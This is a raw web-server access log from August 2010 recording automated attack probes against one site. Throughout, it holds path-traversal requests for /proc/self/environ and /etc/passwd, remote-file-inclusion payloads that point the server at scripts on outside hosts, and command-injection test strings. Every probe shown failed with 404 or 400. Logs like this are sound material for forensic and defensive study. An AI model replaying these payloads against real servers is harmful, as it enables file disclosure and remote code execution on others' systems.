79.174.72.200 - - [22/Aug/2010:12:39:39 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:39:40 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:39:45 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:39:45 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:39:45 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:39:48 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:09 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:40:09 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:15 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:16 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:17 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:40:18 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:40:37 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:40:47 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:51 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:40:51 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:40:51 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:40:51 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:40:53 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:40:56 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:41:06 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:41:06 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
204.188.241.2 - - [22/Aug/2010:12:41:29 -0400] "POST /log//contact.php HTTP/1.1" 404 297
204.188.241.2 - - [22/Aug/2010:12:41:29 -0400] "POST //contact.php HTTP/1.1" 404 293
204.188.241.2 - - [22/Aug/2010:12:41:29 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:41:55 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
92.43.201.28 - - [22/Aug/2010:12:42:12 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:12:42:12 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
173.230.156.231 - - [22/Aug/2010:12:42:15 -0400] "GET /log//index.php?option=com_fabrik&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:42:15 -0400] "GET //index.php?option=com_fabrik&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
202.3.77.174 - - [22/Aug/2010:12:42:19 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.allenbacher.eu/dua?%0D? HTTP/1.1" 404 306
202.3.77.174 - - [22/Aug/2010:12:42:19 -0400] "GET /log//tools/send_reminders.php?noSet=0&includedir=http://www.allenbacher.eu/dua?%0D? HTTP/1.1" 404 310
202.3.77.174 - - [22/Aug/2010:12:42:19 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 306
202.3.77.174 - - [22/Aug/2010:12:42:19 -0400] "GET /log//tools/send_reminders.php?noSet=0&includedir=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 310
174.36.68.98 - - [22/Aug/2010:12:42:27 -0400] "POST /log/contact.php HTTP/1.1" 404 296
174.36.68.98 - - [22/Aug/2010:12:42:27 -0400] "POST /contact.php HTTP/1.1" 404 292
120.50.34.74 - - [22/Aug/2010:12:43:00 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
62.149.233.199 - - [22/Aug/2010:12:43:00 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=http://galepo.webs.com/Ckrid1.txt??? HTTP/1.1" 404 322
120.50.34.74 - - [22/Aug/2010:12:43:00 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
120.50.34.74 - - [22/Aug/2010:12:43:01 -0400] "GET /log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
91.204.116.109 - - [22/Aug/2010:12:43:05 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:43:05 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:43:06 -0400] "GET /log/sdaglobal.org-access_log.2/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:43:06 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:43:06 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
66.135.37.176 - - [22/Aug/2010:12:43:09 -0400] "GET /log/sdaglobal.org-access_log//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 383
173.230.156.231 - - [22/Aug/2010:12:43:10 -0400] "GET /log//index.php?option=com_fabrik&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:43:10 -0400] "GET //index.php?option=com_fabrik&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:43:10 -0400] "GET /log//index.php?option=com_fabrik&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:43:10 -0400] "GET //index.php?option=com_fabrik&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:43:17 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:43:17 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:43:19 -0400] "GET /log/sdaglobal.org-access_log.2/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:43:19 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:43:20 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:43:25 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:43:25 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:43:29 -0400] "GET /log/sdaglobal.org-access_log.2/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:43:29 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:43:30 -0400] "GET /log/sdaglobal.org-access_log.2/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:43:30 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:43:30 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
81.19.215.12 - - [22/Aug/2010:12:43:30 -0400] "GET /log/sdaglobal.org-access_log.3//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:43:30 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:43:30 -0400] "GET /log/sdaglobal.org-access_log.3//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
212.51.183.137 - - [22/Aug/2010:12:43:54 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
212.51.183.137 - - [22/Aug/2010:12:43:54 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:43:55 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
92.62.196.66 - - [22/Aug/2010:12:44:11 -0400] "POST /log//contact.php HTTP/1.1" 404 297
92.62.196.66 - - [22/Aug/2010:12:44:11 -0400] "POST //contact.php HTTP/1.1" 404 293
92.62.196.66 - - [22/Aug/2010:12:44:11 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
74.55.250.50 - - [22/Aug/2010:12:44:11 -0400] "GET /log/sdaglobal.org-access_log//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 383
212.51.183.137 - - [22/Aug/2010:12:44:15 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
212.51.183.137 - - [22/Aug/2010:12:44:15 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:44:15 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:44:21 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:44:21 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:44:23 -0400] "GET /log/sdaglobal.org-access_log.3//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:44:24 -0400] "GET /log/sdaglobal.org-access_log.3//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
212.154.246.147 - - [22/Aug/2010:12:44:42 -0400] "GET /log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
212.154.246.147 - - [22/Aug/2010:12:44:43 -0400] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
77.120.106.44 - - [22/Aug/2010:12:45:02 -0400] "POST //contact.php HTTP/1.1" 404 293
77.120.106.44 - - [22/Aug/2010:12:45:02 -0400] "POST /log//contact.php HTTP/1.1" 404 297
77.120.106.44 - - [22/Aug/2010:12:45:02 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
118.82.114.113 - - [22/Aug/2010:12:45:09 -0400] "GET /%3Cbug%3E/../../../../../../../../etc/passwd HTTP/1.1" 400 309
79.174.72.200 - - [22/Aug/2010:12:45:10 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:45:10 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:45:30 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:45:30 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:45:30 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
91.204.116.109 - - [22/Aug/2010:12:45:32 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:45:32 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:45:33 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
118.82.114.113 - - [22/Aug/2010:12:45:37 -0400] "GET /log//templates/headline_temp.php?nst_inc=http://www.allenbacher.eu/dua?%0D? HTTP/1.1" 404 313
118.82.114.113 - - [22/Aug/2010:12:45:37 -0400] "GET //templates/headline_temp.php?nst_inc=http://www.allenbacher.eu/dua?%0D? HTTP/1.1" 404 309
79.174.72.200 - - [22/Aug/2010:12:46:00 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:46:00 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:46:00 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
91.204.116.109 - - [22/Aug/2010:12:46:00 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:46:01 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:46:01 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
212.154.246.147 - - [22/Aug/2010:12:46:05 -0400] "GET /log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
212.154.246.147 - - [22/Aug/2010:12:46:05 -0400] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:46:12 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:12:46:12 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:46:12 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
79.174.72.200 - - [22/Aug/2010:12:46:14 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:46:15 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:46:15 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:46:57 -0400] "GET /log//index.php?option=com_hsconfig&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:46:57 -0400] "GET //index.php?option=com_hsconfig&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:47:06 -0400] "GET /log//index.php?option=com_hsconfig&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:47:06 -0400] "GET //index.php?option=com_hsconfig&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:47:06 -0400] "GET /log//index.php?option=com_hsconfig&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:47:06 -0400] "GET //index.php?option=com_hsconfig&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:47:12 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:47:13 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:47:13 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
77.120.106.44 - - [22/Aug/2010:12:48:00 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
77.120.106.44 - - [22/Aug/2010:12:48:00 -0400] "POST /log//contact.php HTTP/1.1" 404 297
77.120.106.44 - - [22/Aug/2010:12:48:03 -0400] "POST //contact.php HTTP/1.1" 404 293
79.174.72.200 - - [22/Aug/2010:12:48:18 -0400] "GET /log/sdaglobal.org-access_log.3/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
79.174.72.200 - - [22/Aug/2010:12:48:19 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
79.174.72.200 - - [22/Aug/2010:12:48:19 -0400] "GET /log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:48:21 -0400] "GET //index.php?option=com_joomlaflickr&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:48:22 -0400] "GET /log//index.php?option=com_joomlaflickr&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
92.43.201.28 - - [22/Aug/2010:12:48:26 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:48:26 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:12:48:26 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:48:26 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
